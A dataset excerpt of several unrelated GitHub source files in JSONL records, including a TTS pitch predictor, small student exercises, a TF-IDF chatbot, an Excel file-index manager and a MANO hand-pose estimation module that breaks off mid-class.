stride=1, padding=0),\n torch.nn.ReLU(),\n LayerNorm(n_chans, dim=1),\n torch.nn.Dropout(dropout_rate)\n )]\n if self.dur_loss in [\"mse\", \"huber\"]:\n odims = 1\n elif self.dur_loss == \"mog\":\n odims = 15\n elif self.dur_loss == \"crf\":\n odims = 32\n from torchcrf import CRF\n self.crf = CRF(odims, batch_first=True)\n self.linear = torch.nn.Linear(n_chans, odims)\n\n def forward(self, xs, x_masks=None):\n xs = xs.transpose(1, -1) # (B, idim, Tmax)\n for f in self.conv:\n xs = f(xs) # (B, C, Tmax)\n if x_masks is not None:\n xs = xs * (1 - x_masks.float())[:, None, :]\n\n xs = self.linear(xs.transpose(1, -1)) # [B, T, C]\n xs = xs * (1 - x_masks.float())[:, :, None] # (B, T, C)\n if self.dur_loss in [\"mse\"]:\n xs = xs.squeeze(-1) # (B, Tmax)\n return xs\n\n\nclass PitchPredictor(torch.nn.Module):\n def __init__(self, idim, n_layers=5, n_chans=384, odim=2, kernel_size=5,\n dropout_rate=0.1, padding=\"SAME\"):\n \"\"\"Initilize pitch predictor module.\n Args:\n idim (int): Input dimension.\n n_layers (int, optional): Number of convolutional layers.\n n_chans (int, optional): Number of channels of convolutional layers.\n kernel_size (int, optional): Kernel size of convolutional layers.\n dropout_rate (float, optional): Dropout rate.\n \"\"\"\n super(PitchPredictor, self).__init__()\n self.conv = torch.nn.ModuleList()\n self.kernel_size = kernel_size\n self.padding = padding\n for idx in range(n_layers):\n in_chans = idim if idx == 0 else n_chans\n self.conv += [torch.nn.Sequential(\n torch.nn.ConstantPad1d(((kernel_size - 1) // 2, (kernel_size - 1) // 2)\n if padding == \"SAME\"\n else (kernel_size - 1, 0), 0),\n torch.nn.Conv1d(in_chans, n_chans, kernel_size, stride=1, padding=0),\n torch.nn.ReLU(),\n LayerNorm(n_chans, dim=1),\n torch.nn.Dropout(dropout_rate)\n )]\n self.linear = torch.nn.Linear(n_chans, odim)\n self.embed_positions = SinusoidalPositionalEmbedding(idim, 0, init_size=4096)\n self.pos_embed_alpha = nn.Parameter(torch.Tensor([1]))\n\n def forward(self, xs, squeeze=False):\n \"\"\"\n\n :param xs: [B, T, H]\n :return: [B, T, H]\n \"\"\"\n positions = self.pos_embed_alpha * self.embed_positions(xs[..., 0])\n xs = xs + positions\n xs = xs.transpose(1, -1) # (B, idim, Tmax)\n for f in self.conv:\n xs = f(xs) # (B, C, Tmax)\n # NOTE: calculate in log domain\n xs = self.linear(xs.transpose(1, -1)) # (B, Tmax, 
H)\n return xs.squeeze(-1) if squeeze else xs\n\n\nclass EnergyPredictor(PitchPredictor):\n pass\n","repo_name":"keonlee9420/Comprehensive-Transformer-TTS","sub_path":"model/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":55595,"program_lang":"python","lang":"en","doc_type":"code","stars":292,"dataset":"github-code","pt":"42"} +{"seq_id":"5449074842","text":"###\n### yoda.py\n### \n### Given an input of four words, returns the same four words in reverse order\n###\n### Author: Vladimir Hugec\n### Date: 1/30/18\n\nnotyoda = input(\"Enter a four word sentence: \")\nnotyetyoda = notyoda.split(\" \")\nnearlyyoda = list(reversed(notyetyoda))\n\nyoda = ''\nfor f in nearlyyoda:\n\tyoda = yoda + \" \" + f\n\nprint(yoda)\n","repo_name":"vladhugec/Course-Work","sub_path":"comp11 - intro/hw1/yoda.py","file_name":"yoda.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"42"} +{"seq_id":"31975498416","text":"import cv2 \nimport numpy as np\nimport math\nimport matplotlib.pyplot as mpimg\nfrom matplotlib import pyplot as plt\n\nIMG = cv2.imread('./img.jpg') #import Image\n\nZEROARRAY = np.zeros(IMG.shape, dtype=np.uint8)\n \ndef fill_255(x,y,w,h):\n ZEROARRAY[y:y+h,x:x+w] = 255\n \nfill_255(250,50,200,120) # X Y W H\n\n\nfig, plot = plt.subplots(1,3)\nfig.suptitle('Masked Image')\n\nim_rgb = cv2.cvtColor(IMG, cv2.COLOR_BGR2RGB) # convert to RGB\nplot[0].imshow(im_rgb)\nplot[0].set_title('ORIGINAL') \nplot[1].imshow(ZEROARRAY) \nplot[1].set_title('Image Mask')\nplot[2].imshow(cv2.bitwise_and(ZEROARRAY, im_rgb))\nplot[2].set_title('Bitwise_and Result')\n\n\nplt.show() # display plot\n\n","repo_name":"thanatath/Image_Processing_CLass_65","sub_path":"Activity#2/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3524866664","text":"# Importar las librerias\nimport random\nimport string\nimport warnings\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# TF-IDF: Term Frequency – Inverse Document Frequency\n\n# Descargar vocabulario auxiliar\n# nltk.download() => Abre la interfaz de usuario para ver y descargar el vocabulario\nnltk.download('popular', quiet=True)\nnltk.download('punkt', quiet=True)\nnltk.download('wordnet', quiet=True)\n\n# Variables de chat bot\nBOT_NAME = \"Bot\"\n\n# Keyword Matching for Greeting\nGREETING_INPUTS = (\"hola\", \"oye\", \"saludos\", \"que tal\",)\nGREETING_RESPONSES = [\"Hola\", \"Hola\",\"Encantado que estes chateando conmigo\", \"Estoy contento de que estés chateando conmigo\"]\n\n# Lee el contenido de ChatBot del archivo\nwith open('banco.txt', 'r', encoding='utf8', errors='ignore') as fin:\n raw = fin.read().lower()\n\n# Tokenizar contenido por oraciones\nsent_tokens = nltk.sent_tokenize(raw)\n\n# Fichas de lematización\ndef LemTokens(tokens):\n lemmer = WordNetLemmatizer()\n return [lemmer.lemmatize(token) for token in tokens]\n\n# Lematizar y normalizar texto\ndef LemNormalize(text):\n remove_punct_dict = dict((ord(punct), None)\n for punct in string.punctuation)\n return LemTokens(nltk.word_tokenize(text.lower().translate(remove_punct_dict)))\n\n# retorna un Greeting si el usuario envio un Greeting\ndef greeting(sentence):\n for word in sentence.split():\n if 
word.lower() in GREETING_INPUTS:\n return random.choice(GREETING_RESPONSES)\n\n# Procesar la entrada del usuario, obtener la respuesta y devolverla\ndef response(user_response):\n bot_response = ''\n\n # Procesar la entrada del usuario, obtener la respuesta y devolverla\n sent_tokens.append(user_response)\n\n # Crea y entrena un modelo de vectorizador Tf-Idf\n TfidfVec = TfidfVectorizer(tokenizer=LemNormalize, stop_words='english')\n tfidf = TfidfVec.fit_transform(sent_tokens)\n\n # Obtiene los valores más similares utilizando el método de similitud de coseno ([-1]: Last Item)\n vals = cosine_similarity(tfidf[-1], tfidf)\n\n # Gets The Answer Index to Pick From the Array ([-2]: Last 2 Items)\n idx = vals.argsort()[0][-2]\n\n # Obtiene la respuesta del index para elegir el array\n flat = vals.flatten()\n flat.sort()\n\n # Establece la respuesta del bot a la cadena de respuesta\n if(flat[-2] == 0):\n bot_response = bot_response + \"Lo siento pero no entiendo tu pregunta\"\n else:\n bot_response = bot_response+sent_tokens[idx]\n \n # Elimina la respuesta del usuario de la lista de tokens enviados\n sent_tokens.remove(user_response)\n\n # Devuelve la respuesta del bot\n return bot_response\n\n# Escribir texto al usuario\ndef talk_to_client(message):\n print(f\"{BOT_NAME}: \" + message)\n\n# Ejecuta el Chat Bot\nif __name__ == '__main__':\n flag = True\n talk_to_client(f\"Soy un {BOT_NAME}. Responderé a tus consultas sobre el ámbito financiero\")\n while(flag == True):\n talk_to_client(\n \"Escriba una pregunta sobre el ambito financiero. Si desea salir, escriba ¡Adiós!\")\n user_response = input()\n if(\"Adiós\" in user_response.lower()):\n flag = False\n talk_to_client(\"Adios! Cuidese...\")\n elif (\"gracias\" in user_response.lower()):\n talk_to_client(\"De nada..\")\n elif (greeting(user_response) != None):\n talk_to_client(greeting(user_response))\n else:\n talk_to_client(response(user_response))","repo_name":"FrankAldair/Chat_Bot","sub_path":"Chat.bot.py","file_name":"Chat.bot.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74928960134","text":"from sklearn import datasets\nfrom sklearn import tree\n\n# Carregar a Base de Dados\ndados = datasets.load_iris()\nX, Y, = dados.data, dados.target\n\n# Criar arvore\narvore = tree.DecisionTreeClassifier(max_depth=2, random_state=42)\narvore.fit(X, Y)\n\n# Fazer Classificacao de Registro\nregistro = [7, 3.2, 4.7, 1.4]\nnum_classe = arvore.predict([registro])[0]\nclasse = dados.target_names[num_classe]\nprint('Classificando Registro: ', registro)\nprint('Classe: ', classe)\n\nregistro2 = [9, 2.1, 2.3, 4.5]\nnum_classe = arvore.predict([registro2])[0]\nclasse = dados.target_names[num_classe]\nprint('Classificando Registro: ', registro2)\nprint('Classe 2: ', classe)\n\nregistro3 = [1, 7.1, 7.3, 7.5]\nnum_classe = arvore.predict([registro3])[0]\nclasse = dados.target_names[num_classe]\nprint('Classificando Registro: ', registro3)\nprint('Classe 3: ', classe)","repo_name":"area-41/Mineracao_de_Dados","sub_path":"ArvoreDecisao/ClassificacaoRegistro.py","file_name":"ClassificacaoRegistro.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21910220509","text":"cardapio = {'{coxinha}':5.00, '{pastel}':4.00, '{suco}':3.50, '{bolo}':4.50}\n\n\ndecisao = input('VC quer mudar o Cardapio? 
S ou N').upper()# passando tudo para maisculo\n\nwhile decisao == 'S':\n pergunta = input('Voce Deseja [A]Adicionar. [R]Remover [M]Modificar').upper()\n\n if pergunta == 'A':\n nome = input('Qual produto Deseja Adicionar?')\n valor = float(input('Qual o Valor desse Produto?'))\n cardapio[nome] = valor # q lista vai receber essa chave[nome] e adicionar o valor a ele\n\n elif decisao == 'R':\n nome = input('Qual produto deseja remover? ')# Chave para remoçao\n cardapio.pop(nome, 'não encontrado')# ??????\n\n elif decisao == 'M':\n nome = input('Qual o nome do produto que deseja alterar')# recebe essa chave\n valor = float(input('Qual sera o novo valor do produto {}? '.format(nome)))\n if cardapio.get(nome):\n cardapio[nome] = valor\n #cardapio.update(nome, valor)\n else:\n print('Nome invalido')\n else:\n print('A Opçao Escolhida é Invalida')\n\n decisao = input('\\n Você deseja fazer mais alguma modificação? ').upper()\n\nprint('\\n***************** C A R D Á P I O *****************')\nprint(cardapio)\n\n\n \n","repo_name":"ElizaMSOliveira/Fast-Cesar-School-Python","sub_path":"aula04Pratica03.py","file_name":"aula04Pratica03.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5570326520","text":"def take_skip(str_list, take_num, skip_num):\n taken_num = str_list[:take_num]\n return taken_num\n\n\ndef update_str_list(str_list, take_num, skip_num):\n str_list = str_list[take_num:]\n str_list = str_list[skip_num:]\n return str_list\n\n\nstring = input()\nstr_list = []\nnumber_list = []\n\nfor letter in string:\n if letter.isnumeric():\n number_list.append(letter)\n else:\n str_list.append(letter)\n\nnumber_list = [int(num) for num in number_list]\n\ntake_list = [number_list[num] for num in range(len(number_list)) if num % 2 == 0]\nskip_list = [number_list[num] for num in range(len(number_list)) if num % 2 != 0]\n\nresult_list = []\n\nfor index in range(len(take_list)):\n take_num = take_list[index]\n skip_num = skip_list[index]\n taken_part = take_skip(str_list, take_num, skip_num)\n new_list = update_str_list(str_list, take_num, skip_num)\n str_list = new_list\n result_list.append(taken_part)\n\nresult_list = [''.join(ch) for ch in result_list]\nprint(''.join(result_list))","repo_name":"Svilkata88/SoftUni_python_fundamentials","sub_path":"05_2_2_list_advance_more_exercise/02_take_skip_rope.py","file_name":"02_take_skip_rope.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14274709226","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport time\nfrom openpyxl import load_workbook\nfrom openpyxl.utils import datetime\n\nfrom DataManager import DataManager as DataManager\n\nclass XlManager():\n '''\n 实现Excel读写的功能\n '''\n # 当前加载的Excel文件\n CUR_WB = None\n\n @classmethod\n def load_cur_file(cls,fp):\n '''\n 加载当前使用的Excel文件,供随时访问\n @param fp: Excel文件路径\n '''\n fp = os.path.normcase(fp)\n if os.path.exists(fp):\n cls.CUR_WB = load_workbook(filename = fp)\n\n @classmethod\n def fetch_name(cls,defined_name,is_return_cell=False):\n '''\n 从当前的Excel文件中,加载名称对应的数据\n @param defined_name: Excel中定义的名称\n @param is_return_cell: 是否返回cell对象\n @return: cell对象或列表;泛型数值或列表\n '''\n if not cls.CUR_WB:return\n dn = cls.CUR_WB.defined_names[defined_name]\n cells = []\n for k,v in dn.destinations:\n ws = cls.CUR_WB[k]\n cells.append(ws[v])\n cells = cells[0] # 去掉无用的列表层\n # 返回cell对象\n if is_return_cell:\n return cells\n 
# 返回值\n if type(cells) is tuple: # 区域\n return [ cell.value\n for cell in cells\n if cell.value\n ][1:]\n else: # 单独单元格\n return cells.value\n\n @classmethod\n def load_excel_data(cls,CFG):\n '''\n 加载Excel文件中的数据\n @param CFG: 配置信息,来自ConfManager\n @return: 文件数据字典\n '''\n workbook = load_workbook(filename = CFG.BASE['EXCEL_FILE_PATH'], read_only=True)\n sheet_name = CFG.BASE['LIST_SHEET_NAME']\n if sheet_name not in workbook.sheetnames:\n raise Exception('Excel file wrong!')\n ws = workbook[sheet_name]\n # 先快速从表格读取数据为列表\n data = []\n is_start = False\n for row in ws.rows:\n cur_list = []\n for cell in row:\n if not is_start and cell.value == 'key':\n is_start = True\n if cell.value and cell.is_date: # 处理Excel中记录的时间\n new_value = datetime.to_excel(cell.value)\n else:\n new_value = cell.value\n cur_list.append(new_value)\n if is_start:\n data.append(cur_list)\n workbook.close()\n # 列表转为字典\n excel_data = {}\n headers = data[0]\n for row in data[2:]:\n cur_dic = {}\n for num,value in enumerate(row):\n # 跳过key以及没有值的单元格\n if num == 0 or value is None:continue\n cur_dic[headers[num]] = value\n # 确定key\n list_keys = excel_data.keys()\n if row[0]:\n cur_key = row[0]\n else:\n cur_key = None\n key = DataManager.get_key(cur_dic,CFG,list_keys,cur_key)\n # 数据记录\n excel_data[key] = cur_dic\n # 强制备份Excel数据\n DataManager.backup_data(excel_data)\n return excel_data\n\n @classmethod\n def write_data_to_excel(cls,data,CFG):\n '''\n 写入最终数据至Excel文件中\n @param data: 待写入data(来自FileManager的处理结果)\n @param CFG: 配置信息,来自ConfManager\n '''\n workbook = cls.CUR_WB\n sheet_name = CFG.BASE['LIST_SHEET_NAME']\n if sheet_name not in workbook.sheetnames:\n raise Exception('Excel file wrong!')\n # sheet备份(自动加顺序号)\n if CFG.EXCEL['AUTO_BACKUP']:\n sheet_copy = workbook.copy_worksheet(workbook[sheet_name])\n # 使用原sheet\n ws = workbook[sheet_name]\n # 表头提取\n head_start_cell = cls.get_cell_by_value(ws,'key')\n head_row = ws[head_start_cell.row]\n # 根据表头确定输出字段顺序\n output_params = [cell.value for cell in head_row]\n # 清空无用表格行(保留表头下方文字表头行)\n ws.delete_rows(head_start_cell.row + 2, ws.max_row)\n # 按顺序输出\n p_row = head_start_cell.row + 2 # row指针\n for k,v in data.items():\n p_col = head_start_cell.column # col指针\n for item in output_params:\n # 输出key\n if item == 'key':\n cur_v = k\n # 自动套用公式\n elif item == 'folder_link':\n ref_path = ws.cell(p_row,output_params.index('path')+1).coordinate\n cur_v = f'=HYPERLINK(BASE_FOLDER&\"/\"&{ref_path},\"打开\")'\n elif item == 'file_link':\n ref_path = ws.cell(p_row,output_params.index('path')+1).coordinate\n ref_filename = ws.cell(p_row,output_params.index('filename')+1).coordinate\n ref_ext = ws.cell(p_row,output_params.index('ext')+1).coordinate\n cur_v = f'=HYPERLINK(BASE_FOLDER&\"/\"&{ref_path}&\"/\"&{ref_filename}&\".\"&{ref_ext},\"打开\")'\n elif item == 'filetype':\n ref_cell_addr = ws.cell(p_row,output_params.index('ext')+1).coordinate\n cur_v = f'=IFERROR(VLOOKUP({ref_cell_addr},rEXT_TO_TYPE,2,),\"\")'\n # 时间戳处理\n elif item in ('c_time','m_time','a_time'):\n cur_timestamp = v.get(item.replace('_',''))\n if cur_timestamp:\n cur_v = cls.timestamp_to_str(cur_timestamp)\n else:\n cur_v = ''\n # 正常输出各字段\n else:\n cur_v = v.get(item,'') # 留空不存在数据\n cur_cell = ws.cell(\n column = p_col,\n row = p_row,\n value = cur_v,\n )\n p_col += 1\n p_row += 1\n # 存储\n workbook.save(CFG.BASE['EXCEL_FILE_PATH'])\n\n @staticmethod\n def get_cell_by_value(sheet,value):\n '''\n 按值获取单元格对象(先横后纵,取第一个值)\n @param sheet: 值所在的Excel工作表\n @param value: 所需的值\n @return: cell对象\n '''\n for row in sheet.iter_rows():\n for cell in 
row:\n if cell.value == value:\n return cell\n\n @staticmethod\n def is_excel_opened(fp):\n '''\n 判断Excel文件是否已打开(通过是否生成了~$文件判定)\n @param fp: Excel文件路径\n @return: bool\n '''\n fp = os.path.normcase(fp)\n dir_name,file_name = os.path.split(fp)\n hidden_fp = os.path.join(dir_name,'~$' + file_name)\n return os.path.exists(hidden_fp)\n\n @staticmethod\n def timestamp_to_str(timestamp):\n '''\n 时间戳转字符串时间\n @param timestamp: 时间戳\n @return: 字符串时间\n '''\n time_array = time.localtime(timestamp)\n return time.strftime('%Y-%m-%d %H:%M:%S',time_array)\n\n\nif __name__ == '__main__':\n XlManager.load_cur_file('FileManager.xlsx')\n res = XlManager.fetch_name('NO_HIDDEN_FILES_WIN')\n print(res)\n res = XlManager.fetch_name('rEXT_WHITELIST')\n print(res)\n","repo_name":"gamefang/file_manager","sub_path":"XlManager.py","file_name":"XlManager.py","file_ext":"py","file_size_in_byte":7540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22569854322","text":"from django.urls import path, include\nfrom core_api.views.user_views import UserListView, UserDetailView, SchoolAdminListView, SchoolAdminDetailView\n\napp_name = 'core_api'\n\nurlpatterns = [\n path('exams/', include('exams.urls', namespace='exams')),\n path('users/', include('users.urls', namespace='users')),\n path('fees/', include('fees.urls', namespace='fees')),\n path('schools/', include('school.urls', namespace='schools')),\n]\n","repo_name":"JesseZack/smartSchool","sub_path":"core_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16176302585","text":"def signal_strength(file_name):\n cycle, cycles, reg_val, result = 0, {}, 1, 0\n\n def sum_result(total=0):\n if any([cycle == 20, ((cycle - 20) % 40) == 0]):\n cycles[cycle] = reg_val\n total += cycle * reg_val\n return total\n\n with open(file_name, 'r') as infile:\n for line in infile:\n line = [(int(x) if (x.isdigit() or x[0] == '-') else x)\n for x in line.strip().split(' ')]\n cycle += 1\n result += sum_result()\n if line[0] == 'addx':\n cycle += 1\n result += sum_result()\n reg_val += line[1]\n if len(cycles) == 6:\n return result\n\n\nprint(signal_strength(\"AOC22_D10_inp.txt\"))\n","repo_name":"JHarrisJoshua/Coding_Challenges","sub_path":"AOC/2022/06-10/AOC22_D10_A.py","file_name":"AOC22_D10_A.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"38259857585","text":"\"\"\"Record mapping for a marker-based motion capture system.\n\nEstimates MANO states from marker positions.\n\"\"\"\nimport warnings\n\nimport numpy as np\nfrom pytransform3d import transformations as pt, rotations as pr\nfrom scipy.optimize import minimize\nfrom .mano import HandState, hand_vertices, apply_shape_parameters\nfrom .timing import TimeableMixin\n\n\n# TODO this probably has to be redefined and we have to make sure that this\n# is the same for all tests\nMANO2HAND_MARKERS = pt.invert_transform(pt.transform_from(\n R=pr.active_matrix_from_intrinsic_euler_xyz(np.deg2rad([-5, 97, 0])),\n p=np.array([0.0, -0.03, 0.065])))\n\n\nVERTEX_OFFSET = 0.007 # marker radius: 0.006\nMANO_CONFIG = {\n \"pose_parameters_per_finger\":\n {\n \"thumb\": np.arange(39, 48),\n \"index\": np.arange(3, 12),\n \"middle\": np.arange(12, 21),\n \"ring\": np.arange(30, 39),\n \"little\": np.arange(21, 30),\n },\n \"vertex_indices_per_finger\":\n {\n 
\"thumb\": [724, # tip\n 706, # middle\n ],\n \"index\": [314, # tip\n 261, # middle\n ],\n \"middle\": [426, # tip\n 399, # middle\n ],\n \"little\": [651, # tip\n 627, # middle\n ],\n \"ring\": [534, # tip\n 509, # middle\n ],\n },\n \"joint_indices_per_finger\":\n {\n \"thumb\": (13, 14, 15),\n \"index\": (1, 2, 3),\n \"middle\": (4, 5, 6),\n \"ring\": (10, 11, 12),\n \"little\": (7, 8, 9)\n },\n \"tip_vertex_offsets_per_finger\":\n {\n \"thumb\": [np.array([0.006, 0.006, 0.003]),\n np.array([0.006, 0.006, 0.003])],\n \"index\": [np.array([0, VERTEX_OFFSET, 0]),\n np.array([0, VERTEX_OFFSET, 0])],\n \"middle\": [np.array([0, VERTEX_OFFSET, 0]),\n np.array([0, VERTEX_OFFSET, 0])],\n \"ring\": [np.array([0, VERTEX_OFFSET, 0]),\n np.array([0, VERTEX_OFFSET, 0])],\n \"little\": [np.array([0, VERTEX_OFFSET, 0]),\n np.array([0, VERTEX_OFFSET, 0])]\n },\n \"action_weights_per_finger\":\n {\n \"thumb\": # roll -l/+r -ext/+flex\n np.array([[0.01, 0.01, 0.01, # + positive\n 0.01, 0.01, 0.01,\n 0.01, 0.05, 0.05],\n [0.01, 0.01, 0.01, # - negative\n 0.01, 0.01, 0.01,\n 0.01, 0.05, 0.05]]),\n \"index\":\n np.array([[0.1, 0.001, 0.001, # close to palm\n 0.1, 0.05, 0.001, # middle joint\n 0.1, 0.05, 0.001], # tip joint\n [0.1, 0.001, 0.001,\n 0.1, 0.05, 0.003,\n 0.1, 0.05, 0.005]]),\n \"middle\":\n np.array([[0.1, 0.001, 0.001,\n 0.1, 0.01, 0.001,\n 0.1, 0.01, 0.001],\n [0.1, 0.001, 0.001,\n 0.1, 0.05, 0.005,\n 0.1, 0.05, 0.005]]),\n \"ring\":\n np.array([[0.1, 0.001, 0.001,\n 0.1, 0.01, 0.001,\n 0.1, 0.01, 0.001],\n [0.1, 0.001, 0.001,\n 0.1, 0.05, 0.005,\n 0.1, 0.05, 0.005]]),\n \"little\":\n np.array([[0.1, 0.001, 0.001,\n 0.1, 0.01, 0.001,\n 0.1, 0.01, 0.001],\n [0.1, 0.001, 0.001,\n 0.1, 0.05, 0.005,\n 0.1, 0.05, 0.005]]),\n }\n}\n\n\ndef make_finger_kinematics(hand_state, finger_name, mano_config=MANO_CONFIG):\n return ManoFingerKinematics(\n hand_state,\n mano_config[\"pose_parameters_per_finger\"][finger_name],\n mano_config[\"vertex_indices_per_finger\"][finger_name],\n mano_config[\"joint_indices_per_finger\"][finger_name],\n mano_config[\"action_weights_per_finger\"][finger_name],\n mano_config[\"tip_vertex_offsets_per_finger\"][finger_name])\n\n\nclass MarkerBasedRecordMapping(TimeableMixin):\n \"\"\"Estimates pose of hand and finger configuration based on markers.\n\n We estimate the pose parameters of a MANO hand model from a marker-based\n motion capture system such as the Qualisys system.\n\n Parameters\n ----------\n left : bool, optional (default: False)\n Left hand. Right hand otherwise.\n\n mano2hand_markers : array-like, shape (4, 4)\n Transform from MANO model to hand markers.\n\n shape_parameters : array-like, shape (10,)\n Shape parameters for MANO hand.\n\n hand_state : mocap.mano.HandState, optional (default: None)\n If there is already a hand state object, this can be reused for the\n record mapping. Otherwise we will create a new one.\n\n record_mapping_config : dict, optional (default: None)\n Configuration of record mapping.\n\n use_fingers : tuple of str, optional (default: ('thumb', 'index', 'middle', 'ring', 'little'))\n Fingers for which we compute the record mapping.\n\n verbose : int, optional (default: 0)\n Verbosity level\n\n measure_time : bool\n Measure computation time for each frame.\n\n Attributes\n ----------\n finger_names_ : set of str\n Fingers for which we compute the record mapping.\n\n hand_state_ : mocap.mano.HandState\n MANO hand state. 
This state will be updated by the record mapping\n and should be used to perform a subsequent embodiment mapping based\n on the current state.\n\n mano_finger_kinematics_ : dict (str to ManoFingerKinematics)\n Maps finger names to their kinematic chain in the MANO model.\n\n mano2hand_markers_ : array-like, shape (4, 4)\n Transformation from MANO base frame to marker base frame.\n\n mano2world_ : array-like, shape (4, 4)\n MANO base pose in world frame.\n \"\"\"\n def __init__(\n self, left=False, mano2hand_markers=None, shape_parameters=None,\n hand_state=None, record_mapping_config=None,\n use_fingers=(\"thumb\", \"index\", \"middle\", \"ring\", \"little\"),\n verbose=0, measure_time=False):\n super(MarkerBasedRecordMapping, self).__init__(verbose or measure_time)\n self.finger_names_ = set(use_fingers)\n\n if hand_state is None:\n self.hand_state_ = HandState(left=left)\n if shape_parameters is not None:\n self.hand_state_.betas[:] = shape_parameters\n self.hand_state_.pose_parameters[\"J\"], \\\n self.hand_state_.pose_parameters[\"v_template\"] = \\\n apply_shape_parameters(betas=shape_parameters,\n **self.hand_state_.shape_parameters)\n else:\n self.hand_state_ = hand_state\n\n self.verbose = verbose\n\n if record_mapping_config is None:\n record_mapping_config = MANO_CONFIG\n\n self.mano_finger_kinematics_ = {\n finger_name: make_finger_kinematics(\n self.hand_state_, finger_name, record_mapping_config)\n for finger_name in self.finger_names_\n }\n\n if mano2hand_markers is None:\n self.mano2hand_markers_ = MANO2HAND_MARKERS\n else:\n self.mano2hand_markers_ = mano2hand_markers\n self.current_hand_markers2world = np.eye(4)\n self.mano2world_ = pt.concat(\n self.mano2hand_markers_, self.current_hand_markers2world)\n self.markers_in_mano = {\n finger_name: None for finger_name in self.mano_finger_kinematics_}\n\n def reset(self):\n \"\"\"Reset current joint poses of MANO.\"\"\"\n for finger_name in self.mano_finger_kinematics_:\n self.mano_finger_kinematics_[finger_name].reset()\n\n def estimate(self, hand_markers, finger_markers):\n \"\"\"Estimate hand state from positions of hand markers and finger markers.\n\n Parameters\n ----------\n hand_markers : list\n Markers on hand in order 'hand_top', 'hand_left', 'hand_right'.\n\n finger_markers : dict (str to array-like)\n Positions of markers on fingers.\n \"\"\"\n current_hand_markers2world = estimate_hand_pose(*hand_markers)\n if np.any(np.isnan(current_hand_markers2world)):\n warnings.warn(\n \"[MarkerBasedRecordMapping] Cannot estimate hand pose. 
\"\n \"Detected NaN.\")\n else:\n self.current_hand_markers2world = current_hand_markers2world\n self.mano2world_ = pt.concat(\n self.mano2hand_markers_, self.current_hand_markers2world)\n\n available_fingers = self.finger_names_.intersection(\n finger_markers.keys())\n\n world2mano = pt.invert_transform(self.mano2world_, check=False)\n for finger_name in available_fingers:\n markers_in_world = np.atleast_2d(finger_markers[finger_name])\n self.markers_in_mano[finger_name] = np.dot(\n pt.vectors_to_points(markers_in_world), world2mano.T)[:, :3]\n\n self.start_measurement()\n\n for finger_name in available_fingers:\n fe = self.mano_finger_kinematics_[finger_name]\n finger_pose = fe.inverse(self.markers_in_mano[finger_name])\n self.hand_state_.pose[fe.finger_pose_param_indices] = finger_pose\n\n \"\"\"# joblib parallelization, not faster because of overhead for data transfer\n import joblib\n def estimate_finger_pose(finger_estimator, measurement):\n finger_pose = finger_estimator.estimate(measurement)\n return finger_estimator.finger_pose_param_indices, finger_pose\n\n results = joblib.Parallel(n_jobs=-1)(\n joblib.delayed(estimate_finger_pose)(self.finger_estimators[finger_name],\n self.finger_markers_in_mano[finger_name])\n for finger_name in self.finger_estimators.keys())\n for pose_indices, pose in results:\n self.hand_state.pose[pose_indices] = pose\n #\"\"\"\n\n self.stop_measurement()\n if self.verbose:\n print(f\"[{type(self).__name__}] Time for optimization: \"\n f\"{self.last_timing():.4f} s\")\n\n self.hand_state_.recompute_mesh(self.mano2world_)\n\n\ndef estimate_hand_pose(hand_top, hand_left, hand_right):\n \"\"\"Estimate pose of the hand from markers on the back of the hand.\n\n To estimate the pose of the MANO frame in world frame, we first derive\n the pose of the hand based on three labeled markers on the back of the\n hand. In accordance with the two-vector representation (see Corke:\n Robotics, Vision and Control), we define the hand frame orientation by\n the approach vector (direction from right to front hand marker) and\n the orientation vector (normal of the plane defined by the three\n markers). The origin of the hand frame can be any point in the plane of\n the three markers. 
We choose the right marker.\n\n Parameters\n ----------\n hand_top : array, shape (3,)\n Position of hand_top marker.\n\n hand_left : array, shape (3,)\n Position of hand_left marker.\n\n hand_right : array, shape (3,)\n Position of hand_right marker.\n\n Returns\n -------\n hand_markers2world : array, shape (4, 4)\n Pose of hand marker frame.\n \"\"\"\n right2left = hand_left - hand_right\n approach = pr.norm_vector(hand_top - hand_right)\n orientation = pr.norm_vector(np.cross(approach, right2left))\n normal = np.cross(orientation, approach)\n hand_pose = np.eye(4)\n hand_pose[:3, :3] = np.column_stack((normal, orientation, approach))\n hand_pose[:3, 3] = hand_right\n return hand_pose\n\n\nclass ManoFingerKinematics:\n \"\"\"Estimates the state of a finger.\n\n Parameters\n ----------\n hand_state : HandState\n State of the hand mesh.\n\n finger_pose_param_indices : array, shape (n_finger_joints * 3,)\n Indices of pose parameters of this finger.\n\n finger_vertex_indices : list of int\n Indices of the vertices of which we will optimize the position.\n\n finger_joint_indices : array, shape (n_finger_joints,)\n Indices of joints that correspond to this finger.\n\n action_weights : array, shape (2, n_finger_joints * 3)\n Default weight of action penalty in error function for fingers.\n\n tip_vertex_offsets : list of array\n Offsets of vertex with respect to original vertex in MANO base frame.\n \"\"\"\n def __init__(self, hand_state, finger_pose_param_indices,\n finger_vertex_indices, finger_joint_indices, action_weights,\n tip_vertex_offsets):\n 